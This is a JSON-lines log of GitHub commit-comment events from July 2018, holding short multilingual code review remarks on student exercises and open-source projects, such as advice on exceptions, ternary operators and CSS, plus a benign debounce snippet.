{"id":"7941585654","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29651130,"position":49,"line":49,"path":"Solutions3/Task1/Car.cs","commit_id":"4f3fcfe1dc2bda120a928ef10ca43dbcba33b182","created_at":"2018-07-10T05:38:03Z","updated_at":"2018-07-10T05:38:03Z","author_association":"NONE","body":"Лучше избегать выбрасывания очень обобщённого Exception, т.к. в данном случае он у тебя внутри несёт кастомное сообщение, а бросить тут лучше (если не хочешь кастомное исключение, то что-то аля InvalidOperationException"}},"created_at":"2018-07-10T05:38:03Z"}
{"id":"7941587297","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29651131,"position":1,"line":1,"path":"src/Tests.java","commit_id":"2ed8a521397411ac7e3232dff593d347a8f3dd1c","created_at":"2018-07-10T05:38:38Z","updated_at":"2018-07-10T05:38:38Z","author_association":"NONE","body":"Make appropriate structure\r\n- src\r\n - main\r\n  - classes\r\n - test\r\n  - tests"}},"created_at":"2018-07-10T05:38:38Z"}
{"id":"7941588499","type":"CommitCommentEvent","actor":{"login":"snnugiser"},"repo":{"name":"snnugiser/CodeReview"},"payload":{"comment":{"id":29651137,"position":3,"line":3,"path":"XYZ2BLH.cs","commit_id":"35c7c454be48c8d74aa66e58ba96577e6fc226a8","created_at":"2018-07-10T05:39:06Z","updated_at":"2018-07-10T05:39:06Z","author_association":"OWNER","body":"底层函数不能用 try catch，只有知道异常如何处理时才用try catch 捕捉异常，不然最好用throw exception抛出异常，让上层去处理"}},"created_at":"2018-07-10T05:39:06Z"}
{"id":"7941593019","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651148,"position":11,"line":33,"path":"src/plugins/Invocation.ts","commit_id":"c3e674a48e4ca224c0df8b8927bb74f4b7b7f42d","created_at":"2018-07-10T05:40:39Z","updated_at":"2018-07-10T05:40:39Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T05:40:39Z"}
{"id":"7941594464","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29651151,"position":53,"line":53,"path":"Solutions3/Task1/Train.cs","commit_id":"4f3fcfe1dc2bda120a928ef10ca43dbcba33b182","created_at":"2018-07-10T05:41:10Z","updated_at":"2018-07-10T05:41:10Z","author_association":"NONE","body":"Есть некое правильно построения конструкторов... Если у тебя конструктор один и со всеми тремя атрибутами, то поля самого класса лучше делать приватными, иначе возможно во время работы программы кому-то изменить одно из значений этих полей без пересоздания объекта. Если же где-то надо получать эти значения, то есть геттеры и сеттеры (в этом случае нужны только геттеры). Это просто норма такая, аля паттерна"}},"created_at":"2018-07-10T05:41:10Z"}
{"id":"7941594567","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651153,"position":14,"line":14,"path":"Lesson 3/Route.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T05:41:12Z","updated_at":"2018-07-10T05:41:12Z","author_association":"NONE","body":"зря ты из финальной версии убрал методы \"стейшен фёрст\" и \"стейшен ласт\" - они очень даже хорошо согласуются с этим текстом из ТЗ: \"Имеет начальную и конечную станцию\""}},"created_at":"2018-07-10T05:41:12Z"}
{"id":"7941597598","type":"CommitCommentEvent","actor":{"login":"heyulinxp"},"repo":{"name":"snnugiser/CodeReview"},"payload":{"comment":{"id":29651156,"position":6,"line":6,"path":"XYZ2BLH.cs","commit_id":"35c7c454be48c8d74aa66e58ba96577e6fc226a8","created_at":"2018-07-10T05:42:13Z","updated_at":"2018-07-10T05:42:13Z","author_association":"NONE","body":"神奇的ref和内部new"}},"created_at":"2018-07-10T05:42:13Z"}
{"id":"7941599089","type":"CommitCommentEvent","actor":{"login":"mbartn"},"repo":{"name":"mkarpacka/innowacja"},"payload":{"comment":{"id":29651157,"position":null,"line":null,"path":null,"commit_id":"e0a07988400c2113f92bc936d8adb44d6a3bc44e","created_at":"2018-07-10T05:42:42Z","updated_at":"2018-07-10T05:42:42Z","author_association":"COLLABORATOR","body":"o"}},"created_at":"2018-07-10T05:42:42Z"}
{"id":"7941599300","type":"CommitCommentEvent","actor":{"login":"mbartn"},"repo":{"name":"mkarpacka/innowacja"},"payload":{"comment":{"id":29651158,"position":null,"line":null,"path":null,"commit_id":"e0a07988400c2113f92bc936d8adb44d6a3bc44e","created_at":"2018-07-10T05:42:46Z","updated_at":"2018-07-10T05:42:46Z","author_association":"COLLABORATOR","body":"fajny pusz"}},"created_at":"2018-07-10T05:42:46Z"}
{"id":"7941599607","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651160,"position":18,"line":18,"path":"Lesson 3/Route.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T05:42:51Z","updated_at":"2018-07-10T05:42:51Z","author_association":"NONE","body":"избегай использования тернарного оператора \"ни к месту\"\r\nобычно он усложняет чтение кода\r\nего применение бывает удобным и легко читаемым, но в определенных контекстах\r\nвозможно самое распространенное и  удачное использование тернарника примерно такое:\r\n```ruby\r\nvariable = some_condition ? value1 : value2\r\n```"}},"created_at":"2018-07-10T05:42:51Z"}
{"id":"7941600222","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29651163,"position":9,"line":9,"path":"Solutions3/Task1/Car.cs","commit_id":"4f3fcfe1dc2bda120a928ef10ca43dbcba33b182","created_at":"2018-07-10T05:43:04Z","updated_at":"2018-07-10T05:43:04Z","author_association":"NONE","body":"Ха, да, знаю этот прикол) Лучше Wagon или же RailwayCarriage) \r\nCar - это больше сокращение от Сarriage, ну это не замечание, просто факт)"}},"created_at":"2018-07-10T05:43:04Z"}
{"id":"7941600388","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651164,"position":4,"line":4,"path":"src/opentracing/Recorder.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-10T05:43:08Z","updated_at":"2018-07-10T05:43:08Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T05:43:08Z"}
{"id":"7941602043","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651166,"position":24,"line":24,"path":"Lesson 3/Route.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T05:43:38Z","updated_at":"2018-07-10T05:43:38Z","author_association":"NONE","body":"см. выше про тернарный оператор"}},"created_at":"2018-07-10T05:43:38Z"}
{"id":"7941602912","type":"CommitCommentEvent","actor":{"login":"snnugiser"},"repo":{"name":"snnugiser/CodeReview"},"payload":{"comment":{"id":29651167,"position":6,"line":6,"path":"XYZ2BLH.cs","commit_id":"35c7c454be48c8d74aa66e58ba96577e6fc226a8","created_at":"2018-07-10T05:43:56Z","updated_at":"2018-07-10T05:43:56Z","author_association":"OWNER","body":"@heyulinxp  要说怎么改"}},"created_at":"2018-07-10T05:43:56Z"}
{"id":"7941603398","type":"CommitCommentEvent","actor":{"login":"robeastwood-agency"},"repo":{"name":"robeastwood-agency/au-fhir-base"},"payload":{"comment":{"id":29651170,"position":19,"line":19,"path":"examples/observation-age-example-6monthsto5years.xml","commit_id":"e8da42b68196eb586f30918a04a94c67111038ca","created_at":"2018-07-10T05:44:05Z","updated_at":"2018-07-10T05:44:05Z","author_association":"OWNER","body":"This structure violates a [mandatory specification rule on the range datatype](http://hl7.org/fhir/datatypes.html#range) such that the units must be the same.\r\n\r\n> The unit and code/system elements of the low or high elements SHALL match.\r\n\r\nThe units need to be either month (5-60 months) or years (0.5-5 years)."}},"created_at":"2018-07-10T05:44:05Z"}
{"id":"7941603926","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29651171,"position":30,"line":30,"path":"Solutions3/Task2/Hotel.cs","commit_id":"4f3fcfe1dc2bda120a928ef10ca43dbcba33b182","created_at":"2018-07-10T05:44:14Z","updated_at":"2018-07-10T05:44:14Z","author_association":"NONE","body":"Разный функционал у классов - лучше разные классы делать, не всё под одним, иначе тут ООП потом в дальнейшем сложно будет обернуть"}},"created_at":"2018-07-10T05:44:14Z"}
{"id":"7941607009","type":"CommitCommentEvent","actor":{"login":"ifyour"},"repo":{"name":"ifyour/ifyour.github.io"},"payload":{"comment":{"id":29651174,"position":null,"line":null,"path":null,"commit_id":"fc469d1c81beb1749906925dde30814ad6e9872d","created_at":"2018-07-10T05:45:16Z","updated_at":"2018-07-10T05:45:16Z","author_association":"OWNER","body":"与之对应的有 **函数防抖**:\r\n\r\n```js\r\nfunction debounce(fn, interval = 300) {\r\n    let timeout = null;\r\n    return function () {\r\n        clearTimeout(timeout);\r\n        timeout = setTimeout(() => {\r\n            fn.apply(this, arguments);\r\n        }, interval);\r\n    };\r\n}\r\n```\r\n\r\n* 在 300ms 的时间范围内, 不重复执行\r\n* 这是节流函数的简单实现, 关于节流函数可以参考[这篇文章](https://github.com/mqyqingfeng/Blog/issues/22)\r\n\r\n\r\n## 总结\r\n* 函数节流: 间歇性执行, 防止无效计算, 提高性能\r\n* 函数防抖: 时间范围内不执行, 防止重复的计算, 提高性能"}},"created_at":"2018-07-10T05:45:16Z"}
{"id":"7941608631","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29651178,"position":58,"line":58,"path":"Solutions3/Task2/Hotel.cs","commit_id":"4f3fcfe1dc2bda120a928ef10ca43dbcba33b182","created_at":"2018-07-10T05:45:49Z","updated_at":"2018-07-10T05:45:49Z","author_association":"NONE","body":"Не проверил ссылки на объекты\r\nЕщё аля this == obj\r\nведь можно передать туда одну и ту же ссылку и если они совпадут, то не за чем вызывать в конце метод GetHashCode, т.к. это лишние использование ресурсов"}},"created_at":"2018-07-10T05:45:49Z"}
{"id":"7941609063","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651179,"position":28,"line":13,"path":"Lesson 3/Route.rb","commit_id":"a615be3e558022e83d9a318d0184c114a2e1849f","created_at":"2018-07-10T05:45:58Z","updated_at":"2018-07-10T05:45:58Z","author_association":"NONE","body":"в задании:\r\n\"Может удалять **промежуточную** станцию из списка\"\r\n\r\nтвой метод удалит **любую** станцию,  в том числе начальную и конечную, что неверно\r\n"}},"created_at":"2018-07-10T05:45:58Z"}
{"id":"7941609269","type":"CommitCommentEvent","actor":{"login":"Aashu13"},"repo":{"name":"wesbos/JavaScript30"},"payload":{"comment":{"id":29651180,"position":null,"line":null,"path":null,"commit_id":"4b18521784b8e32a6ee2df2cfeae56823af0a055","created_at":"2018-07-10T05:46:01Z","updated_at":"2018-07-10T05:46:01Z","author_association":"NONE","body":"How to download a images from web bos javascript 30"}},"created_at":"2018-07-10T05:46:01Z"}
{"id":"7941609834","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29651181,"position":72,"line":72,"path":"Solutions3/Task2/Hotel.cs","commit_id":"4f3fcfe1dc2bda120a928ef10ca43dbcba33b182","created_at":"2018-07-10T05:46:13Z","updated_at":"2018-07-10T05:46:13Z","author_association":"NONE","body":"Аналогично с областью видимости private и геттерами"}},"created_at":"2018-07-10T05:46:13Z"}
{"id":"7941610029","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651185,"position":28,"line":13,"path":"Lesson 3/Route.rb","commit_id":"a615be3e558022e83d9a318d0184c114a2e1849f","created_at":"2018-07-10T05:46:18Z","updated_at":"2018-07-10T05:46:18Z","author_association":"NONE","body":"смысл этой проверки вообще туманен ))"}},"created_at":"2018-07-10T05:46:18Z"}
{"id":"7941613557","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29651193,"position":null,"line":null,"path":null,"commit_id":"e8275ee29b06e2884b68f262e9bb085b7efdc673","created_at":"2018-07-10T05:47:34Z","updated_at":"2018-07-10T05:47:34Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-10T05:47:34Z"}
{"id":"7941619170","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651202,"position":32,"line":32,"path":"Lesson 3/Route.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T05:49:28Z","updated_at":"2018-07-10T05:49:28Z","author_association":"NONE","body":"1. проще использовать `puts` - он автоматом добавляет перенос строки\r\n2. лучше конечно выводить не целиком объекты на печать, а к примеру имена станций"}},"created_at":"2018-07-10T05:49:28Z"}
{"id":"7941624612","type":"CommitCommentEvent","actor":{"login":"Aqibsarwar"},"repo":{"name":"Aqibsarwar/CastBack"},"payload":{"comment":{"id":29651212,"position":null,"line":null,"path":null,"commit_id":"f9b616b95fd9ee5fc499089930f04b4979f55764","created_at":"2018-07-10T05:51:17Z","updated_at":"2018-07-10T05:51:17Z","author_association":"OWNER","body":"Castback app help website Update Date : 10/7/2018"}},"created_at":"2018-07-10T05:51:17Z"}
{"id":"7941626197","type":"CommitCommentEvent","actor":{"login":"qyf94"},"repo":{"name":"qyf94/vue-scratchcard"},"payload":{"comment":{"id":29651215,"position":null,"line":null,"path":null,"commit_id":"c7fe227b3d799c938b685ecdfefb705e70c64c0b","created_at":"2018-07-10T05:51:46Z","updated_at":"2018-07-10T05:51:46Z","author_association":"OWNER","body":"不好意思，刚看到，请问空格的格式有什么要求吗？"}},"created_at":"2018-07-10T05:51:46Z"}
{"id":"7941626383","type":"CommitCommentEvent","actor":{"login":"pranithsrujanroy"},"repo":{"name":"raiucp/Text_Summarizer"},"payload":{"comment":{"id":29651216,"position":null,"line":null,"path":null,"commit_id":"4a41d85a03e944fc8dca12802d97957f7b8d0e93","created_at":"2018-07-10T05:51:50Z","updated_at":"2018-07-10T05:51:50Z","author_association":"COLLABORATOR","body":"pyglet was not working right? Comment it out if possible."}},"created_at":"2018-07-10T05:51:50Z"}
{"id":"7941628703","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651221,"position":63,"line":63,"path":"src/opentracing/Span.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-10T05:52:34Z","updated_at":"2018-07-10T05:52:34Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T05:52:34Z"}
{"id":"7941631871","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651227,"position":75,"line":75,"path":"src/opentracing/Span.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-10T05:53:37Z","updated_at":"2018-07-10T05:53:37Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T05:53:37Z"}
{"id":"7941635282","type":"CommitCommentEvent","actor":{"login":"montekpune"},"repo":{"name":"montekpune/midtest"},"payload":{"comment":{"id":29651230,"position":null,"line":null,"path":null,"commit_id":"b89ff30f309fc0420a1e81b8835ae08a00b75073","created_at":"2018-07-10T05:54:45Z","updated_at":"2018-07-10T05:54:45Z","author_association":"OWNER","body":"good work"}},"created_at":"2018-07-10T05:54:45Z"}
{"id":"7941639061","type":"CommitCommentEvent","actor":{"login":"double-beep"},"repo":{"name":"Counterply/asmFish"},"payload":{"comment":{"id":29651233,"position":6,"line":1253,"path":"x86/Evaluate.asm","commit_id":"3e749a260fe6e21e2822bb0dc0176db12bcc4b06","created_at":"2018-07-10T05:56:02Z","updated_at":"2018-07-10T05:56:02Z","author_association":"NONE","body":"Why renaming `RankFactor`?"}},"created_at":"2018-07-10T05:56:02Z"}
{"id":"7941640204","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"och-karr/zadanie_15_6"},"payload":{"comment":{"id":29651234,"position":4,"line":4,"path":"css/style.css","commit_id":"b29061ac56e65667fdda73896dbd9150ded2a3bc","created_at":"2018-07-10T05:56:24Z","updated_at":"2018-07-10T05:56:24Z","author_association":"NONE","body":"Lepiej byłoby zrobić w body jakiś `container` i jemu ustawić margin. Na `body` nie powinno się robić takich akcji 👎 "}},"created_at":"2018-07-10T05:56:24Z"}
{"id":"7941642033","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651235,"position":17,"line":17,"path":"Lesson 3/train.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T05:57:01Z","updated_at":"2018-07-10T05:57:01Z","author_association":"NONE","body":"один из немногих случаев, когда использование тернарного опертора более-менее оправданно )\r\n"}},"created_at":"2018-07-10T05:57:01Z"}
{"id":"7941643059","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651236,"position":6,"line":6,"path":"src/opentracing/SpanTree.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-10T05:57:21Z","updated_at":"2018-07-10T05:57:21Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T05:57:21Z"}
{"id":"7941643101","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"och-karr/zadanie_15_6"},"payload":{"comment":{"id":29651237,"position":7,"line":7,"path":"css/style.css","commit_id":"b29061ac56e65667fdda73896dbd9150ded2a3bc","created_at":"2018-07-10T05:57:21Z","updated_at":"2018-07-10T05:57:21Z","author_association":"NONE","body":"Staraj się używać zapisu HEX czyli `#...` o ile przy białym kolorze to nie ma znaczenia tak np kolor `yellow` może być postrzegany różnie przez różne przeglądarki."}},"created_at":"2018-07-10T05:57:21Z"}
{"id":"7941643413","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"och-karr/zadanie_15_6"},"payload":{"comment":{"id":29651238,"position":14,"line":14,"path":"css/style.css","commit_id":"b29061ac56e65667fdda73896dbd9150ded2a3bc","created_at":"2018-07-10T05:57:28Z","updated_at":"2018-07-10T05:57:28Z","author_association":"NONE","body":"patrz wyżej"}},"created_at":"2018-07-10T05:57:28Z"}
{"id":"7941643775","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651239,"position":23,"line":23,"path":"src/opentracing/Recorder.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-10T05:57:34Z","updated_at":"2018-07-10T05:57:34Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T05:57:34Z"}
{"id":"7941644005","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"och-karr/zadanie_15_6"},"payload":{"comment":{"id":29651240,"position":25,"line":25,"path":"css/style.css","commit_id":"b29061ac56e65667fdda73896dbd9150ded2a3bc","created_at":"2018-07-10T05:57:39Z","updated_at":"2018-07-10T05:57:39Z","author_association":"NONE","body":"patrz wyżej"}},"created_at":"2018-07-10T05:57:39Z"}
{"id":"7941645031","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651241,"position":17,"line":17,"path":"Lesson 3/train.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T05:57:59Z","updated_at":"2018-07-10T05:57:59Z","author_association":"NONE","body":"остальные тернарники надо убрать... они сложно читаются и смешивают логику с аутпутом\r\nи то и другое - минусы"}},"created_at":"2018-07-10T05:57:59Z"}
{"id":"7941645348","type":"CommitCommentEvent","actor":{"login":"sandeepduddu"},"repo":{"name":"prassaad/ClientRegistration"},"payload":{"comment":{"id":29651243,"position":null,"line":null,"path":null,"commit_id":"71d50235523e981d85f13465321751dab43feca5","created_at":"2018-07-10T05:58:04Z","updated_at":"2018-07-10T05:58:04Z","author_association":"COLLABORATOR","body":"Dont Merge this code, Wrong file uploaded."}},"created_at":"2018-07-10T05:58:04Z"}
{"id":"7941649517","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"och-karr/zadanie_15_6"},"payload":{"comment":{"id":29651251,"position":5,"line":5,"path":"package.json","commit_id":"b29061ac56e65667fdda73896dbd9150ded2a3bc","created_at":"2018-07-10T05:59:22Z","updated_at":"2018-07-10T05:59:22Z","author_association":"NONE","body":"Nie taki plik 👎 "}},"created_at":"2018-07-10T05:59:22Z"}
{"id":"7941650792","type":"CommitCommentEvent","actor":{"login":"brusch"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29651254,"position":null,"line":null,"path":null,"commit_id":"2c24923c5a011f767e3894c3a6c0cf5238332d73","created_at":"2018-07-10T05:59:45Z","updated_at":"2018-07-10T05:59:45Z","author_association":"MEMBER","body":"@Yivan hmm, interesting, seems to be a rendering issue since in the source-code it is all fine: \r\nhttps://github.com/pimcore/pimcore/blob/master/doc/Development_Documentation/19_Development_Tools_and_Details/09_Cache/README.md#L83\r\nhttps://github.com/pimcore/pimcore/blob/master/doc/Development_Documentation/23_Installation_and_Upgrade/01_System_Requirements.md#L78\r\n\r\n"}},"created_at":"2018-07-10T05:59:45Z"}
{"id":"7941651143","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651255,"position":44,"line":44,"path":"src/opentracing/Span.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-10T05:59:52Z","updated_at":"2018-07-10T05:59:52Z","author_association":"NONE","body":"This case is for if parent context is null. If statement below takes traceId from its parent."}},"created_at":"2018-07-10T05:59:52Z"}
{"id":"7941653461","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"och-karr/zadanie_15_6"},"payload":{"comment":{"id":29651266,"position":65,"line":65,"path":"script.js","commit_id":"b29061ac56e65667fdda73896dbd9150ded2a3bc","created_at":"2018-07-10T06:00:33Z","updated_at":"2018-07-10T06:00:33Z","author_association":"NONE","body":"Wszędzie korzystamy z ES6 bez jQuery. Spróbuj tutaj też nie korzystać z jQuery"}},"created_at":"2018-07-10T06:00:33Z"}
{"id":"7941653819","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651268,"position":26,"line":26,"path":"Lesson 3/train.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T06:00:39Z","updated_at":"2018-07-10T06:00:39Z","author_association":"NONE","body":"хм.. а если один вагон, то его нельзя отцепить? почему `>= 2`?"}},"created_at":"2018-07-10T06:00:39Z"}
{"id":"7941653896","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"och-karr/zadanie_15_6"},"payload":{"comment":{"id":29651269,"position":71,"line":71,"path":"script.js","commit_id":"b29061ac56e65667fdda73896dbd9150ded2a3bc","created_at":"2018-07-10T06:00:41Z","updated_at":"2018-07-10T06:00:41Z","author_association":"NONE","body":"Patrz wyżej"}},"created_at":"2018-07-10T06:00:41Z"}
{"id":"7941653900","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29651270,"position":5,"line":27,"path":"3-16/3-16.cpp","commit_id":"e82771fef216c6c5fbd2bf666c0eee8d34c68ef1","created_at":"2018-07-10T06:00:41Z","updated_at":"2018-07-10T06:00:41Z","author_association":"COLLABORATOR","body":"インデントずれてませんか？(石井)"}},"created_at":"2018-07-10T06:00:41Z"}
{"id":"7941656011","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651280,"position":21,"line":21,"path":"Lesson 3/train.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T06:01:19Z","updated_at":"2018-07-10T06:01:19Z","author_association":"NONE","body":"ТЗ: \"Может прицеплять/отцеплять вагоны (по одному вагону за операцию...\"\r\nпо одному\r\nзачем тогда аргумент у этого метода?"}},"created_at":"2018-07-10T06:01:19Z"}
{"id":"7941656923","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651284,"position":21,"line":21,"path":"Lesson 3/train.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T06:01:38Z","updated_at":"2018-07-10T06:01:38Z","author_association":"NONE","body":"тот же вопрос к следующему методу"}},"created_at":"2018-07-10T06:01:38Z"}
{"id":"7941657453","type":"CommitCommentEvent","actor":{"login":"alexfederovitch"},"repo":{"name":"alexfederovitch/Responsive-Portfolio"},"payload":{"comment":{"id":29651286,"position":1,"line":1,"path":"CNAME","commit_id":"a4c9d30800039201b6037a349002d320143f5b3e","created_at":"2018-07-10T06:01:49Z","updated_at":"2018-07-10T06:01:49Z","author_association":"OWNER","body":"Removing CNAME"}},"created_at":"2018-07-10T06:01:49Z"}
{"id":"7941659994","type":"CommitCommentEvent","actor":{"login":"IzzySoft"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29651287,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-10T06:02:41Z","updated_at":"2018-07-10T06:02:41Z","author_association":"NONE","body":"@JohnMH sorry for bothering you once more, but I'm a bit confused:\r\n\r\n> I will not be pushing any further commits for any software to GitHub.\r\n\r\nHere you clearly say you're no longer maintaining it at Github. So if it is not moved elsewhere (GitLab.com, your own hosted GitLab CE or whereever to), I read this as \"this app will no longer be maintained\". Did I get this right?"}},"created_at":"2018-07-10T06:02:41Z"}
{"id":"7941663992","type":"CommitCommentEvent","actor":{"login":"dgansauskas"},"repo":{"name":"dgansauskas/eventex"},"payload":{"comment":{"id":29651292,"position":null,"line":null,"path":null,"commit_id":"27221c38065576c9c1906e015dd87b4bc5be053e","created_at":"2018-07-10T06:04:00Z","updated_at":"2018-07-10T06:04:00Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-10T06:04:00Z"}
{"id":"7941666487","type":"CommitCommentEvent","actor":{"login":"davidpccu"},"repo":{"name":"ReactStudyGroup/onlinereadbook"},"payload":{"comment":{"id":29651295,"position":null,"line":null,"path":null,"commit_id":"4f03ee74abf2aa254e2f5f37636a7f54e9966416","created_at":"2018-07-10T06:04:47Z","updated_at":"2018-07-10T06:04:47Z","author_association":"CONTRIBUTOR","body":"地點拉"}},"created_at":"2018-07-10T06:04:47Z"}
{"id":"7941676567","type":"CommitCommentEvent","actor":{"login":"Xottab-DUTY"},"repo":{"name":"q4a/xray-16"},"payload":{"comment":{"id":29651308,"position":6,"line":248,"path":"src/xrEngine/xr_input.cpp","commit_id":"e7963eba3ff80ad60cb7be63abaef6c0569e53da","created_at":"2018-07-10T06:08:02Z","updated_at":"2018-07-10T06:08:02Z","author_association":"COLLABORATOR","body":"Are you sure?!"}},"created_at":"2018-07-10T06:08:02Z"}
{"id":"7941678323","type":"CommitCommentEvent","actor":{"login":"Xottab-DUTY"},"repo":{"name":"q4a/xray-16"},"payload":{"comment":{"id":29651309,"position":6,"line":248,"path":"src/xrEngine/xr_input.cpp","commit_id":"e7963eba3ff80ad60cb7be63abaef6c0569e53da","created_at":"2018-07-10T06:08:36Z","updated_at":"2018-07-10T06:08:36Z","author_association":"COLLABORATOR","body":"Hmm.. Or it was moved below?"}},"created_at":"2018-07-10T06:08:36Z"}
